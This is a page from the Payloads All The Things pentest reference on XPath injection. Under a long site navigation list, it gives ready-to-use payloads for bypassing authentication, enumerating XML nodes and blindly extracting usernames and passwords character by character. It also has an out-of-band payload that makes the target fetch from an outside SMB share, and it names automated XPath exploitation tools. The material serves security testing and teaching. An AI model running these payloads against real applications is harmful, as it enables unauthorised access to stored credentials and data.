Skip to content

Payloads All The Things

XPATH injection

Payloads All The Things

Payloads All The Things [![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Payloads%20All%20The%20Things,%20a%20list%20of%20useful%20payloads%20and%20bypasses%20for%20Web%20Application%20Security%20-%20by%20@pentest_swissky&url=https://github.com/swisskyrepo/PayloadsAllTheThings/)
Books
CONTRIBUTING
Twitter
Youtube
API Key Leaks
API Key Leaks
- API Key Leaks
AWS Amazon Bucket S3
AWS Amazon Bucket S3
- Amazon Bucket S3 AWS
Account Takeover
Account Takeover
- Account Takeover
CORS Misconfiguration
CORS Misconfiguration
- CORS Misconfiguration
CRLF Injection
CRLF Injection
- CRLF
CSRF Injection
CSRF Injection
- Cross-Site Request Forgery
CSV Injection
CSV Injection
- CSV Injection (Formula Injection)
CVE Exploits
CVE Exploits
- Common Vulnerabilities and Exposures
- CVE-2021-44228 Log4Shell
Command Injection
Command Injection
- Command Injection
DNS Rebinding
DNS Rebinding
- DNS Rebinding
Dependency Confusion
Dependency Confusion
- Dependency Confusion
Directory Traversal
Directory Traversal
- Directory traversal
File Inclusion
File Inclusion
- File Inclusion
GraphQL Injection
GraphQL Injection
- GraphQL injection
HTTP Parameter Pollution
HTTP Parameter Pollution
- HTTP Parameter Pollution
Insecure Deserialization
Insecure Deserialization
Insecure Direct Object References
Insecure Direct Object References
- Insecure Direct Object References
Insecure Management Interface
Insecure Management Interface
- Insecure management interface
Insecure Source Code Management
Insecure Source Code Management
- Insecure source code management
JSON Web Token
JSON Web Token
- JWT - JSON Web Token
Java RMI
Java RMI
- Java RMI
Kubernetes
Kubernetes
- Kubernetes
LDAP Injection
LDAP Injection
- LDAP injection
LaTeX Injection
LaTeX Injection
- LaTex Injection
Methodology and Resources
Methodology and Resources
NoSQL Injection
NoSQL Injection
- NoSQL injection
OAuth
OAuth
- OAuth
Open Redirect
Open Redirect
- Open URL Redirection
Race Condition
Race Condition
- Race Condition
Request Smuggling
Request Smuggling
- Request Smuggling
SAML Injection
SAML Injection
- SAML Injection
SQL Injection
SQL Injection
Server Side Request Forgery
Server Side Request Forgery
- Server-Side Request Forgery
Server Side Template Injection
Server Side Template Injection
- Templates Injections
Tabnabbing
Tabnabbing
- Tabnabbing
Type Juggling
Type Juggling
- PHP Juggling type and magic hashes
Upload Insecure Files
Upload Insecure Files
- Upload
- CVE Ffmpeg HLS
  CVE Ffmpeg HLS
  - FFmpeg HLS vulnerability
- Configuration Apache .htaccess
  Configuration Apache .htaccess
  - .htaccess upload
- Configuration Busybox httpd.conf
  Configuration Busybox httpd.conf
  - Index
- Extension Flash
  Extension Flash
  - Index
- Picture Image Magik
  Picture Image Magik
  - Image Tragik 1 & 2
- Zip Slip
  Zip Slip
  - Zip Slip
Web Cache Deception
Web Cache Deception
- Web Cache Deception Attack
Web Sockets
Web Sockets
- Web Sockets Attacks
XPATH Injection
XPATH Injection
- XPATH injection XPATH injection
  Table of contents
XSLT Injection
XSLT Injection
- XSLT Injection
XSS Injection
XSS Injection
XXE Injection
XXE Injection
- XML External Entity
template vuln
template vuln
- Vulnerability Title

XPATH injection

XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.

Summary

Exploitation
Blind exploitation
Out Of Band Exploitation
Tools
References

Exploitation

Similar to SQL : "string(//user[name/text()='" +vuln_var1+ "' and password/text()=’" +vuln_var1+ "']/account/text())"

' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1
search=')] | //user/*[contains(*,'
search=Har') and contains(../password,'c
search=Har') and starts-with(../password,'c

Size of a string sql and string-length(account)=SIZE_INT
Extract a character sql substring(//user[userid=5]/username,2,1)=CHAR_HERE substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)

Out Of Band Exploitation

http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')

Tools

xcat - Automate XPath injection attacks to retrieve documents
xxxpwn - Advanced XPath Injection Tool
xxxpwn_smart - A fork of xxxpwn using predictive text
xpath-blind-explorer
XmlChor - Xpath injection exploitation tool

References

Last update: August 30, 2022